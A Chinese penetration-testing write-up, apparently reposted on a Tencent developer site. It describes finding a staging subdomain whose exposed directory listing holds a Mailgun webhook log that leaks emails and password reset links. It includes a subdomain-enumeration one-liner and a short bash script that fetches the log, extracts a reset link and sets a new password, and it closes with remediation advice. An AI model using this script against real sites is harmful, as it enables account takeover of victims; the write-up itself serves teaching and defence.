首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

渗透测试实战:利用列目录漏洞重置密码

列目录是最常见的错误配置之一,列目录漏洞到底影响多严重,取决于关键性文件的出现。

最近,我在渗透测试中,我遇到了一个有趣的目录列表,并且可以利用它。通过枚举,我发现了一个子域,这是分段服务器,并可以通过互联网访问。

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/?q=%.domain.com | sed 's/]+>//g' | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "

www.domain.com

blog.domain.com

stag.domain.co

在进行端口扫描时,发现端口8080已打开,并有一个目录列表,我发现有个log日志。

从log中,我发现日志不仅泄露了个人和开发人员的电子邮件地址,还有重置密码链接。像这样的东西。

日志文件中,可能出现这样的功能场景:

2.受害者点击发送到他们的电子邮件地址的链接。

3.攻击者获取密码重置令牌,因为目录列表并重置密码。

我写了一个快速的脚本来查看mailgun-webhook.log文件,搜索重置链接并自动重置密码。

curl https://domain.com/mailgun-webhook.log | tee direct.txt

if grep -Fxq "reset" direct.txt

then

echo "[+]Found a Password Reset link"

link=$(cat direct.txt | grep -i reset | cut -d "," -f6 |

cut -d "" -f1 | head -n 1)

curl '$link'-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)'

--data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed

echo "[+]Password changed to testpassword!!"

else

echo "[-]Reset link not found"

fi

建议禁用目录列表,不要以明文形式存储敏感信息,例如凭证,密码重置链接,API密钥。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180111A0OOI600?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券